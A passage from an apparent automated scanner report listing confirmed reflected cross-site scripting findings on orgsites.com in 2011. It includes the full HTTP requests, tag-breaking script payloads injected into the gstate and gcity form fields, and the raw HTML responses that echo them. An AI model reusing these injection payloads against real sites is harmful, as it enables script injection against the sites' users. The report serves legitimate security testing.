height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value="3"><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=\'\"--></style></script><script>netsparker(0x00258A)</script>>\'\"--></style></script><script>netsparker(0x00258A)</script><OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value="3"><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="ca/caf-socal" target="_blank">CAF - SouthernCalifornia Wing&#039;sWWII Aviation Museum</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Unique<br />Camarillo, CA</td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
keyw POST 3
neighborhood POST ALL
gstate POST '"--></style></script><script>alert(0x002593)</script>
gcity POST 3
sts POST Y

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 130
Accept-Encoding: gzip, deflate

keyw=3&neighborhood=ALL&gstate='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002593)%3c%2fscript%3e&gcity=3&sts=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:34:53 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=1773736385; expires=Tue, 03-May-11 17:35:03 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All OrgSites:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In 3,\'\"--></style></script><script>netsparker(0x002593)</script></td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value="3"><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION value=\'\"--></style></script><script>netsparker(0x002593)</script>>\'\"--></style></script><script>netsparker(0x002593)</script><OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value="3"><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="ca/caf-socal" target="_blank">CAF - SouthernCalifornia Wing&#039;sWWII Aviation Museum</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Unique<br />Camarillo, CA</td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face=&..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
keyw POST 3
neighborhood POST ALL
gstate POST ALL
gcity POST '"--></style></script><script>alert(0x0025A3)</script>
sts POST Y

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 132
Accept-Encoding: gzip, deflate

keyw=3&neighborhood=ALL&gstate=ALL&gcity='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0025A3)%3c%2fscript%3e&sts=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:35:08 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=638029186; expires=Tue, 03-May-11 17:35:10 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All OrgSites:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In \'\"--></style></script><script>netsparker(0x0025A3)</script>,In All States</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value="3"><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
